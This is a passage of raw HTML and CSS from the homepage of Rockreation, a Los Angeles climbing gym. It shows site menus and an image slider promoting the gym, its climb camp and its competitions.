class="menu_icon blank fa"></i></span><span class="item_text">Meal Plans</span></span><span class="plus"></span></a></li> </ul></div></div> </li> <li id="nav-menu-item-50597" class="menu-item menu-item-type-post_type menu-item-object-page narrow"><a href="https://rockreation-la.com/contact/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Contact Us</span></span><span class="plus"></span></a></li> <li id="nav-menu-item-51141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub narrow"><a href="https://rockreation-la.com/events-calendar/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Calendar</span></span><span class="plus"></span></a> <div class="second"><div class="inner"><ul> <li id="nav-menu-item-52683" class="menu-item menu-item-type-custom menu-item-object-custom "><a href="https://rockreation-cm.com/comps/" class=""><span class="item_inner"><span class="menu_icon_wrapper"><i class="menu_icon blank fa"></i></span><span class="item_text">Competitions</span></span><span class="plus"></span></a></li> </ul></div></div> </li> </ul> </nav> <div class="header_inner_right"> <div class="side_menu_button_wrapper right"> <div class="side_menu_button"> <a class="side_menu_button_link normal" href="javascript:void(0)"> <i class="edgt_icon_font_awesome fa fa-arrow-circle-right " ></i> </a> </div> </div> </div> <nav class="mobile_menu"> <ul id="menu-main_menu-1" class=""><li id="mobile-menu-item-50497" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-20 current_page_item active"><a href="https://rockreation-la.com/" class=" current "><span>Home</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50596" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub"><a href="https://rockreation-la.com/about/" class=""><span>About</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span> <ul class="sub_menu"> <li id="mobile-menu-item-50621" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/new-to-rockreation/" class=""><span>New to Rockreation?</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-51456" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/facilities/" class=""><span>Facilities</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50598" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/gallery/" class=""><span>Gallery</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50623" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/job-postings/" class=""><span>Job Postings</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> </ul> </li> <li id="mobile-menu-item-50617" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub"><a href="https://rockreation-la.com/rates/" class=""><span>Rates</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span> <ul class="sub_menu"> <li id="mobile-menu-item-51820" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/gift-cards/" class=""><span>Gift Cards</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> </ul> </li> <li id="mobile-menu-item-50626" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub"><h4><span>Programs</span></h4><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span> <ul class="sub_menu"> <li id="mobile-menu-item-50630" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/climbing-classes/" class=""><span>Climbing Classes</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50633" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/fitness-classes/" class=""><span>Fitness Classes</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50638" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/yoga/" class=""><span>Yoga Classes</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50637" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/for-kids/" class=""><span>For Kids!</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-52144" class="menu-item menu-item-type-custom menu-item-object-custom "><a target="_blank" href="http://rockreation.com/rockwarriors/" class=""><span>Rock Warriors &#038; Youth Teams</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50643" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/team-building-corporate/" class=""><span>Team Building + Corporate</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-50647" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/birthdayparties/" class=""><span>Birthday Parties</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-51463" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/climb-camp/" class=""><span>Climb Camp</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-52062" class="menu-item menu-item-type-custom menu-item-object-custom "><a href="https://diettogo.com/pricing?coupon=ROCKREATION20&amp;PUL=1367" class=""><span>Meal Plans</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> </ul> </li> <li id="mobile-menu-item-50597" class="menu-item menu-item-type-post_type menu-item-object-page "><a href="https://rockreation-la.com/contact/" class=""><span>Contact Us</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> <li id="mobile-menu-item-51141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children has_sub"><a href="https://rockreation-la.com/events-calendar/" class=""><span>Calendar</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span> <ul class="sub_menu"> <li id="mobile-menu-item-52683" class="menu-item menu-item-type-custom menu-item-object-custom "><a href="https://rockreation-cm.com/comps/" class=""><span>Competitions</span></a><span class="mobile_arrow"><i class="fa fa-angle-right"></i><i class="fa fa-angle-down"></i></span></li> </ul> </li> </ul> </nav> </div> </div> </div> </div> </div> </header> <a id='back_to_top' class="" href='#'> <span class="edgt_icon_stack"> <span aria-hidden="true" class="edgt_icon_font_elegant arrow_carrot-up " ></span> </span> </a> <div class="content content_top_margin"> <div class="content_inner "> <div class="full_width" > <div class="full_width_inner" > <div class="vc_row wpb_row section full_screen_section" style='background-color:#ffffff; border-bottom: 1px solid #ffffff; border-top: 1px solid #ffffff; padding-top:0px; padding-bottom:3px; text-align:center;'><div class=" full_section_inner clearfix" style='padding-left: 5px;padding-right: 5px'><div class="wpb_column vc_column_container vc_col-sm-12 vc_col-has-fill"><div class="vc_column-inner vc_custom_1525644596461"><div class="wpb_wrapper"> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <div class="n2-section-smartslider "><style>div#n2-ss-2{width:1200px;float:left;margin:0px 0px 0px 0px;}html[dir="rtl"] div#n2-ss-2{float:right;}div#n2-ss-2 .n2-ss-slider-1{position:relative;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;height:375px;border-style:solid;border-width:0px;border-color:#3e3e3e;border-color:RGBA(62,62,62,1);border-radius:0px;background-clip:padding-box;background-repeat:repeat;background-position:50% 50%;background-size:cover;background-attachment:scroll;}div#n2-ss-2 .n2-ss-slider-background-video-container{position:absolute;left:0;top:0;width:100%;height:100%;overflow:hidden;}div#n2-ss-2 .n2-ss-slider-2{position:relative;width:100%;height:100%;}.x-firefox div#n2-ss-2 .n2-ss-slider-2{opacity:0.99999;}div#n2-ss-2 .n2-ss-slider-3{position:relative;width:100%;height:100%;overflow:hidden;outline:1px solid rgba(0,0,0,0);z-index:10;}div#n2-ss-2 .n2-ss-slide-backgrounds,div#n2-ss-2 .n2-ss-slider-3 > .n-particles-js-canvas-el,div#n2-ss-2 .n2-ss-slider-3 > .n2-ss-divider{position:absolute;left:0;top:0;width:100%;height:100%;}div#n2-ss-2 .n2-ss-slide-backgrounds{z-index:10;}div#n2-ss-2 .n2-ss-slider-3 > .n-particles-js-canvas-el{z-index:12;}div#n2-ss-2 .n2-ss-slide-backgrounds > *{overflow:hidden;}div#n2-ss-2 .n2-ss-slide{position:absolute;top:0;left:0;width:100%;height:100%;z-index:20;display:block;-webkit-backface-visibility:hidden;}div#n2-ss-2 .n2-ss-layers-container{position:relative;width:1200px;height:375px;}div#n2-ss-2 .n2-ss-parallax-clip > .n2-ss-layers-container{position:absolute;right:0;}div#n2-ss-2 .n2-ss-slide{perspective:1500px;}div#n2-ss-2[data-ie] .n2-ss-slide{perspective:none;transform:perspective(1500px);}div#n2-ss-2 .n2-ss-slide-active{z-index:21;}div#n2-ss-2 .n2-ss-button-container,div#n2-ss-2 .n2-ss-button-container a{display:inline-block;}div#n2-ss-2 .n2-ss-button-container.n2-ss-fullwidth,div#n2-ss-2 .n2-ss-button-container.n2-ss-fullwidth a{display:block;}div#n2-ss-2 .n2-ss-button-container.n2-ss-nowrap{white-space:nowrap;}div#n2-ss-2 .n2-ss-button-container a div{display:inline;font-size:inherit;text-decoration:inherit;color:inherit;line-height:inherit;font-family:inherit;font-weight:inherit;}div#n2-ss-2 .n2-ss-button-container a > div{display:inline-flex;align-items:center;vertical-align:top;}div#n2-ss-2 .n2-ss-button-container i{font-size:100%;vertical-align:baseline;}div#n2-ss-2 .n2-ss-button-container a[data-iconplacement="left"] i{margin-right:0.3em;}div#n2-ss-2 .n2-ss-button-container a[data-iconplacement="right"] i{margin-left:0.3em;}div#n2-ss-2 .nextend-arrow{cursor:pointer;overflow:hidden;line-height:0 !important;z-index:20;}div#n2-ss-2 .nextend-arrow img{position:relative;min-height:0;min-width:0;vertical-align:top;width:auto;height:auto;max-width:100%;max-height:100%;display:inline;}div#n2-ss-2 .nextend-arrow img.n2-arrow-hover-img{display:none;}div#n2-ss-2 .nextend-arrow:HOVER img.n2-arrow-hover-img{display:inline;}div#n2-ss-2 .nextend-arrow:HOVER img.n2-arrow-normal-img{display:none;}div#n2-ss-2 .nextend-arrow-animated{overflow:hidden;}div#n2-ss-2 .nextend-arrow-animated > div{position:relative;}div#n2-ss-2 .nextend-arrow-animated .n2-active{position:absolute;}div#n2-ss-2 .nextend-arrow-animated-fade{transition:background 0.3s, opacity 0.4s;}div#n2-ss-2 .nextend-arrow-animated-horizontal > div{transition:all 0.4s;left:0;}div#n2-ss-2 .nextend-arrow-animated-horizontal .n2-active{top:0;}div#n2-ss-2 .nextend-arrow-previous.nextend-arrow-animated-horizontal:HOVER > div,div#n2-ss-2 .nextend-arrow-next.nextend-arrow-animated-horizontal .n2-active{left:-100%;}div#n2-ss-2 .nextend-arrow-previous.nextend-arrow-animated-horizontal .n2-active,div#n2-ss-2 .nextend-arrow-next.nextend-arrow-animated-horizontal:HOVER > div{left:100%;}div#n2-ss-2 .nextend-arrow.nextend-arrow-animated-horizontal:HOVER .n2-active{left:0;}div#n2-ss-2 .nextend-arrow-animated-vertical > div{transition:all 0.4s;top:0;}div#n2-ss-2 .nextend-arrow-animated-vertical .n2-active{left:0;}div#n2-ss-2 .nextend-arrow-animated-vertical .n2-active{top:-100%;}div#n2-ss-2 .nextend-arrow-animated-vertical:HOVER > div{top:100%;}div#n2-ss-2 .nextend-arrow-animated-vertical:HOVER .n2-active{top:0;}div#n2-ss-2 .n2-ss-control-bullet{visibility:hidden;text-align:center;justify-content:center;}div#n2-ss-2 .n2-ss-control-bullet-horizontal.n2-ss-control-bullet-fullsize{width:100%;}div#n2-ss-2 .n2-ss-control-bullet-vertical.n2-ss-control-bullet-fullsize{height:100%;flex-flow:column;}div#n2-ss-2 .nextend-bullet-bar{display:inline-flex;visibility:visible;align-items:center;flex-wrap:wrap;}div#n2-ss-2 .n2-bar-justify-content-left{justify-content:flex-start;}div#n2-ss-2 .n2-bar-justify-content-center{justify-content:center;}div#n2-ss-2 .n2-bar-justify-content-right{justify-content:flex-end;}div#n2-ss-2 .n2-ss-control-bullet-vertical > .nextend-bullet-bar{flex-flow:column;}div#n2-ss-2 .n2-ss-control-bullet-fullsize > .nextend-bullet-bar{display:flex;}div#n2-ss-2 .n2-ss-control-bullet-horizontal.n2-ss-control-bullet-fullsize > .nextend-bullet-bar{flex:1 1 auto;}div#n2-ss-2 .n2-ss-control-bullet-vertical.n2-ss-control-bullet-fullsize > .nextend-bullet-bar{height:100%;}div#n2-ss-2 .nextend-bullet-bar > div{display:inline-block;cursor:pointer;transition:background-color 0.4s;vertical-align:top;}div#n2-ss-2 .nextend-bullet-bar > div.n2-active{cursor:default;}div#n2-ss-2 div.n2-ss-bullet-thumbnail-container{position:absolute;opacity:0;z-index:10000000;}div#n2-ss-2 .n2-ss-bullet-thumbnail-container .n2-ss-bullet-thumbnail{background-size:cover;background-repeat:no-repeat;background-position:center;}div#n2-ss-2 .n2-ss-layer .n2-font-91ea750aa4ce6c44508180920074974c-hover{font-family: 'Montserrat','Arial';color: #ffffff;font-size:112.5%;text-shadow: 2px 3px 5px RGBA(0,0,0,1);line-height: 1.5;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: uppercase;}div#n2-ss-2 .n2-style-29fe619a321c49aaf9d97344cf838bc3-heading{background: #ffffff;background: RGBA(255,255,255,0);opacity:1;padding:0px 0px 0px 0px ;box-shadow: none;border-width: 0px;border-style: solid;border-color: #000000; border-color: RGBA(0,0,0,1);border-radius:0px;border-bottom: 3px solid #fff;}div#n2-ss-2 .n2-ss-layer .n2-font-50d1b27cf6bd1dcc593c923efaf49a4e-hover{font-family: 'Playfair Display';color: #ffffff;font-size:300%;text-shadow: 2px 3px 5px RGBA(0,0,0,1);line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: none;}div#n2-ss-2 .n2-font-0c59a28111707b8131e5dde257d942a3-link a{font-family: 'Montserrat','Arial';color: #ffffff;font-size:100%;text-shadow: 2px 3px 5px RGBA(0,0,0,1);line-height: 1.5;font-weight: bold;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: none;}div#n2-ss-2 .n2-font-0c59a28111707b8131e5dde257d942a3-link a:HOVER, div#n2-ss-2 .n2-font-0c59a28111707b8131e5dde257d942a3-link a:ACTIVE, div#n2-ss-2 .n2-font-0c59a28111707b8131e5dde257d942a3-link a:FOCUS{color: #262626;}div#n2-ss-2 .n2-style-4ebd1314c90790bf169c3325cd1a3f1b-heading{background: #fd46aa;background: RGBA(253,70,170,0.72);opacity:1;padding:0.8em 1.5em 0.8em 1.5em ;box-shadow: none;border-width: 2px;border-style: solid;border-color: #ffffff; border-color: RGBA(255,255,255,1);border-radius:99px;}div#n2-ss-2 .n2-style-4ebd1314c90790bf169c3325cd1a3f1b-heading:Hover, div#n2-ss-2 .n2-style-4ebd1314c90790bf169c3325cd1a3f1b-heading:ACTIVE, div#n2-ss-2 .n2-style-4ebd1314c90790bf169c3325cd1a3f1b-heading:FOCUS{background: #ffffff;}div#n2-ss-2 .n2-ss-layer .n2-font-df31ee031043c529155c9cacd7429d0d-hover{font-family: 'Montserrat','Arial';color: #ffffff;font-size:112.5%;text-shadow: none;line-height: 1.5;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: uppercase;}div#n2-ss-2 .n2-ss-layer .n2-font-cc209f896c8412acc6d52964da47e34e-hover{font-family: 'Playfair Display';color: #ffffff;font-size:281.25%;text-shadow: none;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: left;letter-spacing: normal;word-spacing: normal;text-transform: none;}div#n2-ss-2 .n2-font-75774b5a595fadfc3656349b99c5effa-link a{font-family: 'Montserrat','Arial';color: #ffffff;font-size:100%;text-shadow: none;line-height: 1.5;font-weight: bold;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: none;}div#n2-ss-2 .n2-font-75774b5a595fadfc3656349b99c5effa-link a:HOVER, div#n2-ss-2 .n2-font-75774b5a595fadfc3656349b99c5effa-link a:ACTIVE, div#n2-ss-2 .n2-font-75774b5a595fadfc3656349b99c5effa-link a:FOCUS{color: #262626;}div#n2-ss-2 .n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading{background: #ffffff;background: RGBA(255,255,255,0);opacity:1;padding:0.8em 1.5em 0.8em 1.5em ;box-shadow: none;border-width: 2px;border-style: solid;border-color: #ffffff; border-color: RGBA(255,255,255,1);border-radius:99px;}div#n2-ss-2 .n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading:Hover, div#n2-ss-2 .n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading:ACTIVE, div#n2-ss-2 .n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading:FOCUS{background: #ffffff;}div#n2-ss-2 .n2-ss-layer .n2-font-b04df6a52b104228032d2ad4ddd4a501-hover{font-family: 'Montserrat','Arial';color: #ff0000;font-size:112.5%;text-shadow: none;line-height: 1.5;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: uppercase;font-weight: 400;}div#n2-ss-2 .n2-ss-layer .n2-font-72917a316ce8c8cb95a049042a70df00-hover{font-family: 'Playfair Display';color: #ffffff;font-size:300%;text-shadow: none;line-height: 1.3;font-weight: bold;font-style: normal;text-decoration: none;text-align: center;letter-spacing: normal;word-spacing: normal;text-transform: none;}div#n2-ss-2 .n2-style-71f8992c8fa2aba15e7858625601a6fa-dot{background: #ffffff;background: RGBA(255,255,255,0.5);opacity:1;padding:5px 5px 5px 5px ;box-shadow: none;border-width: 0px;border-style: solid;border-color: #000000; border-color: RGBA(0,0,0,1);border-radius:50px;margin: 4px;}div#n2-ss-2 .n2-style-71f8992c8fa2aba15e7858625601a6fa-dot.n2-active, div#n2-ss-2 .n2-style-71f8992c8fa2aba15e7858625601a6fa-dot:HOVER{background: #ffffff;}div#n2-ss-2 .n2-style-a80a1ff3b8ddafcea99c72dc3040a2b3-simple{background: #000000;background: RGBA(0,0,0,0.5);opacity:1;padding:0px 0px 0px 0px ;box-shadow: none;border-width: 0px;border-style: solid;border-color: #000000; border-color: RGBA(0,0,0,1);border-radius:3px;margin: 5px;}</style><div id="n2-ss-2-align" class="n2-ss-align"><div class="n2-padding"><div id="n2-ss-2" data-creator="Smart Slider 3" class="n2-ss-slider n2-ow n2-has-hover n2notransition n2-ss-load-fade " data-minFontSizedesktopPortrait="4" data-minFontSizedesktopLandscape="4" data-minFontSizetabletPortrait="4" data-minFontSizetabletLandscape="4" data-minFontSizemobilePortrait="4" data-minFontSizemobileLandscape="4" style="font-size: 16px;" data-fontsize="16"> <div class="n2-ss-slider-1 n2-ss-swipe-element n2-ow" style=""> <div class="n2-ss-slider-2 n2-ow"> <div class="n2-ss-slider-3 n2-ow" style=""> <div class="n2-ss-slide-backgrounds"></div><div data-first="1" data-slide-duration="0" data-id="4" data-thumbnail="//rockreation-la.com/wp-content/uploads/2018/11/November2018-IMG_0093-1.jpg" style="" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-4"><div class="n2-ss-slide-background n2-ow" data-mode="fill"><div data-hash="6e9b578bc0eedfd0affb72086d7fbcfe" data-desktop="//rockreation-la.com/wp-content/uploads/2018/11/November2018-IMG_0093-1.jpg" class="n2-ss-slide-background-image" data-blur="0"><img src="//rockreation-la.com/wp-content/uploads/2018/11/November2018-IMG_0093-1.jpg" alt="" /></div></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""><div class="n2-ss-layer n2-ow" style="max-width: 1020px;overflow:visible;" data-csstextalign="inherit" data-has-maxwidth="1" data-desktopportraitmaxwidth="1020" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-pm="content" data-desktopportraitpadding="20|*|20|*|20|*|20|*|px+" data-desktopportraitinneralign="inherit" data-tabletportraitinneralign="inherit" data-sstype="content" data-hasbackground="0" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="1" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-section-main-content n2-ss-layer-content n2-ow" style="padding:1.25em 1.25em 1.25em 1.25em ;" data-verticalalign="center"><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0.9375em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|15|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div id="n2-ss-2item1" class="n2-font-91ea750aa4ce6c44508180920074974c-hover n2-style-29fe619a321c49aaf9d97344cf838bc3-heading n2-ss-item-content n2-ow" style="display:inline-block;white-space:nowrap;">A LEGACY</div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 1.875em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|30|*|0|*|px+" data-mobileportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-tabletportraitfontsize="80" data-mobileportraitfontsize="60" data-plugin="rendered"><div id="n2-ss-2item2" class=" n2-ss-item-content n2-ow" style="display:block;"><a class="n2-ow n2-font-50d1b27cf6bd1dcc593c923efaf49a4e-hover " style="display:block;" href="https://rockreation-la.com/about/">THE ORIGINAL LOS ANGELES <br />CLIMBING GYM</a></div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|0|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-button-container n2-ss-item-content n2-ow n2-font-0c59a28111707b8131e5dde257d942a3-link n2-ss-nowrap"><a class="n2-style-4ebd1314c90790bf169c3325cd1a3f1b-heading n2-ow " href="#https://rockreation-la.com/about/"><div><div>About Us</div></div></a></div></div></div></div></div></div><div data-slide-duration="0" data-id="10" data-thumbnail="//rockreation-la.com/wp-content/uploads/2019/01/HoodieSlide2.jpg" data-haslink="1" style="cursor:pointer;" onclick="" data-href="https://rockreation-la.com/rates/" data-n2click="n2const.setLocation(this.getAttribute(&#039;data-href&#039;))" data-n2middleclick="window.open(this.getAttribute(&#039;data-href&#039;),&#039;_blank&#039;);" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-10"><div class="n2-ss-slide-background n2-ow" data-mode="blurfit"><div data-hash="8bd79bf22e994c26ea0f26b8f0df2121" data-desktop="//rockreation-la.com/wp-content/uploads/2019/01/HoodieSlide2.jpg" class="n2-ss-slide-background-image" data-blur="0"><img src="//rockreation-la.com/wp-content/uploads/2019/01/HoodieSlide2.jpg" alt="" /></div></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""></div></div><div data-slide-duration="0" data-id="11" data-thumbnail="//rockreation-la.com/wp-content/uploads/2018/10/IMG_6526-2.jpg" style="" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-11"><div class="n2-ss-slide-background n2-ow" data-mode="fill"><div data-hash="f09db833471cd3a8c80e96641f826951" data-desktop="//rockreation-la.com/wp-content/uploads/2018/10/IMG_6526-2.jpg" class="n2-ss-slide-background-image" data-blur="0"><img title="Climb Camp" src="//rockreation-la.com/wp-content/uploads/2018/10/IMG_6526-2.jpg" alt="" /></div></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""><div class="n2-ss-layer n2-ow" style="max-width: 1020px;overflow:visible;" data-csstextalign="inherit" data-has-maxwidth="1" data-desktopportraitmaxwidth="1020" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-pm="content" data-desktopportraitpadding="20|*|20|*|20|*|20|*|px+" data-desktopportraitinneralign="inherit" data-tabletportraitinneralign="inherit" data-sstype="content" data-hasbackground="0" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="1" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-section-main-content n2-ss-layer-content n2-ow" style="padding:1.25em 1.25em 1.25em 1.25em ;" data-verticalalign="center"><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0.9375em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|15|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="left" data-desktopportraitselfalign="left" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div id="n2-ss-2item4" class="n2-font-df31ee031043c529155c9cacd7429d0d-hover n2-style-29fe619a321c49aaf9d97344cf838bc3-heading n2-ss-item-content n2-ow" style="display:inline-block;white-space:nowrap;">CLIMB CAMP</div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 1.875em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|30|*|0|*|px+" data-mobileportraitmargin="0|*|0|*|10|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="left" data-desktopportraitselfalign="left" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-tabletportraitfontsize="80" data-mobileportraitfontsize="60" data-plugin="rendered"><div id="n2-ss-2item5" class=" n2-ss-item-content n2-ow" style="display:block;"><a class="n2-ow n2-font-cc209f896c8412acc6d52964da47e34e-hover " style="display:block;" href="https://rockreation-la.com/climb-camp/">Focus, self-confidence, <br />& strength through <br />rock climbing</a></div></div><div class="n2-ss-layer n2-ow" style="margin:0em 0em 0em 0em ;overflow:visible;" data-pm="normal" data-desktopportraitmargin="0|*|0|*|0|*|0|*|px+" data-desktopportraitheight="0" data-has-maxwidth="0" data-desktopportraitmaxwidth="0" data-cssselfalign="left" data-desktopportraitselfalign="left" data-sstype="layer" data-rotation="0" data-desktopportrait="1" data-desktoplandscape="1" data-tabletportrait="1" data-tabletlandscape="1" data-mobileportrait="1" data-mobilelandscape="1" data-adaptivefont="0" data-desktopportraitfontsize="100" data-plugin="rendered"><div class="n2-ss-button-container n2-ss-item-content n2-ow n2-font-75774b5a595fadfc3656349b99c5effa-link n2-ss-nowrap"><a class="n2-style-cf6192b2903574c3fa2e25e3b85c8d68-heading n2-ow " href="https://rockreation-la.com/climb-camp/"><div><div>More Info</div></div></a></div></div></div></div></div></div><div data-slide-duration="0" data-id="5" data-thumbnail="//rockreation-la.com/wp-content/uploads/2017/03/RockClimbingComp-3252.jpg" data-haslink="1" style="cursor:pointer;" onclick="" data-href="https://rockreation-cm.com/comps/" data-n2click="n2const.setLocation(this.getAttribute(&#039;data-href&#039;))" data-n2middleclick="window.open(this.getAttribute(&#039;data-href&#039;),&#039;_blank&#039;);" class=" n2-ss-slide n2-ss-canvas n2-ow n2-ss-slide-5"><div class="n2-ss-slide-background n2-ow" data-mode="fill"><div data-hash="ef74a0b4455c1de48dbccf0fe0983221" data-desktop="//rockreation-la.com/wp-content/uploads/2017/03/RockClimbingComp-3252.jpg" class="n2-ss-slide-background-image" data-blur="0"><img src="//rockreation-la.com/wp-content/uploads/2017/03/RockClimbingComp-3252.jpg" alt="" /></div></div><div class="n2-ss-layers-container n2-ow" data-csstextalign="center" style=""><div class="n2-ss-layer n2-ow" style="max-width: 850px;overflow:visible;" data-csstextalign="inherit" data-has-maxwidth="1" data-desktopportraitmaxwidth="850" data-cssselfalign="inherit" data-desktopportraitselfalign="inherit" data-pm="content" data-desktopportraitpadding="20|*|20|*|20|*|20|*|px+" 